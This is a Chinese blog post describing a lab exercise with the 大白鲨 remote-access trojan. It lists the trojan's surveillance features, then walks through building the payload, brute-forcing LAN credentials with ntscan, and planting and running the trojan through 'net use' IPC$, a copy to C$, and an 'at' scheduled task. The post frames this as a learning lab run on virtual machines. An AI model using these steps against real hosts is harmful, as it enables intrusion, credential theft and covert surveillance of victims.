使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接

Posted 2021-09-04 Zeker62

实验环境建议在虚拟机上运行

科学无罪，所有实验环境都在局域网内进行

实验条件

• 两个Windows虚拟机
• 一个安装大白鲨远程控制软件
• 两个虚拟机开启ftp服务（用于木马文件之间的传输）

大白鲨远程控制软件是一个比较旧的攻击软件

大白鲨远程控制 2010 Bate1(v1.6)
运行平台：Win2K、WinXP、Win03、WinVista、Win07、Win2008
软件简介：
兼容1.4~1.3版本
单一exe，不带DLL文件(无可没配置前114KB,压缩52KB)！
注入进程兼容win7/win8/vista
功能简介：
1.屏幕监控，可以查看对方屏幕以及鼠标监控、键盘监控、强制关闭显示器等。
2.视频监控、可以查看对方视频,含有MSH263,IndeoVideo5.04,IntelIndeo®VideoR3.2编码
3.CMD命令：模拟CMD。也就是telnet命令执行
4.文件管理：磁盘空间查看、文件浏览、WinRAR压缩解压(必须有安装WINRAR)、执行文件(以后缀执行/Exe类型执行)、上传、下载、删除、新建(文件/文件夹)…
5.进程管理：进程信息查看。包括进程创建时间，父进程ID等…，可以结束进程。
6.服务管理：服务信息查看。包括服务的PID、启动时间、模块路径、描述。等查看，可以对服务进行基本操作.
7.注册表管理：类似于注册表模拟器，可以删除指定注册表值，键，以及新建等…
8.窗口管理：可以设置窗口标题、对窗口的其他操作，比如关闭窗口（包括父窗口）或隐藏窗口等…
9.附加功能：分为“信息查看”与“插件管理”。
<1>信息查看：可以看对方系统信息，服务端配置信息，宽带信息需要上传指定插件才能查看！
<2>插件管理”能上传插件并启用对应的功能！“比如HTTP代理”。
10.其他管理：有点类似与恶作剧，有禁止鼠标活动与键盘活动功能==，还有查看剪切板字符串==等功能。
11.批量操作：分为“筛选主机”、“修改配置”、“发送信息”、“其它操作”4个面板！
<1>筛选主机：可以筛选你先要进行批量操作的主机，如内存大于512MB，小于2048MB的主机
<2>修改配置：可以修改上线信息，如IP、端口或者备注！
<3>发送信息：分为发生“窗口信息”和“屏幕字体”两种信息。
<4>其它操作：可以下载URL文件，隐藏打开网页、重启、关机、开启3389端口、更新被控端功能

开始实验

将Windows7 IP地址配置成 10.1.1.3，winserver2003 IP地址配置成10.1.1.1

打开大白鲨远控exe

先设置好一个端口，以免端口冲突

配置程序

IP设置成我们服务端IP，即hacker的IP地址，点击确定

将生成的MyServer.exe文件保存在桌面，这个就是木马文件

本机测试一下

先在本地测试一下，单机木马文件运行
听见“有主机上线请注意”，即连接成功。

发送到目标主机进行控制

建议使用ftp文件发送，避免经过物理机。

打开（或者搭建）ftp服务



运行

已有主机上线，成功

远程登录主机进行文件传输

使用工具ntscan ，爆破破解局域网内的主机用户名及密码
可以及时更新字典，因为知道密码，所以我就直接把密码加到字典里做个样子。

爆破成功

知道主机账户名和密码后，远程登录主机，直接开搞。
Windows下有个叫任务计划的东西，我们可以使用命令行控制

回到hacker，输入命令

net use \\\\10.1.1.1\\ipc$ * /user:Administrator

net use是远程登录的意思，* 代表待会输入密码，这样密码就不是明文显示在命令行，更加安全

远程登录之后，使用命令：

copy Myserver.exe \\\\10.1.1.1\\c$

去那边查看一下，发现传输成功

我们新建计划任务，先看看对方的时间，对方的时间可能跟我们的不一样，所以这一步不能省。

创建任务，并查看计划任务

at \\\\10.1.1.1 15:32 \\\\10.1.1.1\\c$\\Myserver.exe
at \\\\10.1.1.1

返回大白鲨验证

成功连接

控制目标机

尝试远程屏幕监控（成功）

成功

路漫漫其修远兮，还没入门